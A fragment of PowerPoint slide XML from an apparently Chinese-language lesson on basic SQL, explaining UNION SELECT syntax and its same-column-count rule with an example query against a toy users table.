              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021624" y="701566"/>
            <a:ext cx="3447063" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>基本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>知识</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C33A93AA-ABC9-4F7D-964B-2A5FAFCF92C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1744333" y="1298425"/>
            <a:ext cx="4305987" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>联合查询（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>UNION SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{506A9063-63A2-47AD-8125-A799B95F7095}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1839496" y="2011225"/>
            <a:ext cx="5822646" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查询语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查询语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A158C39-B726-4DB1-8A64-609BF4A18408}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8525013" y="960469"/>
            <a:ext cx="1028578" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="文本框 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8CDC50B-F6B9-47FB-AE35-E3E864543989}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1839496" y="4514547"/>
            <a:ext cx="5109091" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>所有查询语句必须拥有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>相同数量的列</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B0A128B-02DF-407F-BF6D-9DD547DF1E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021624" y="4134281"/>
            <a:ext cx="1107996" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注意：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F52E157B-EA8C-4D19-962F-2D25FAC60A36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1623527" y="5573400"/>
            <a:ext cx="8973932" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Select  passwd from users where id=1 union select username; </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="28" name="表格 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07EA76D8-58F9-4B6F-AF2A-79B82399A675}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4072611788"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7054791" y="1456745"/>
          <a:ext cx="4166695" cy="2315448"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="555505">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3217910847"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1805595">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="289602206"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1805595">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2781414587"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>id</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>username</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>passwd</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2334648633"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Admin</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Password</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2527666147"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Bob</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>123</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="656364240"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>user1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>pass1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2831422024"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="文本框 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B6A3ECB-F490-4F5D-8765-21F7D36F9507}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1091320" y="5109994"/>
            <a:ext cx="653013" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>例：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="文本框 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{336CE6B7-0522-4AAB-8032-B62443BE134B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1839496" y="3273156"/>
            <a:ext cx="3237722" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>整合多个的查询结果</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="文本框 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E40B074-BDEA-4751-8498-1778633A5B40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021624" y="2905926"/>
            <a:ext cx="997017" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>效果：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="文本框 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD28FFB6-7A62-4843-8086-C0EB842E0067}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021624" y="1683034"/>
            <a:ext cx="997017" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>格式：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1610719405"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428990" y="363281"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
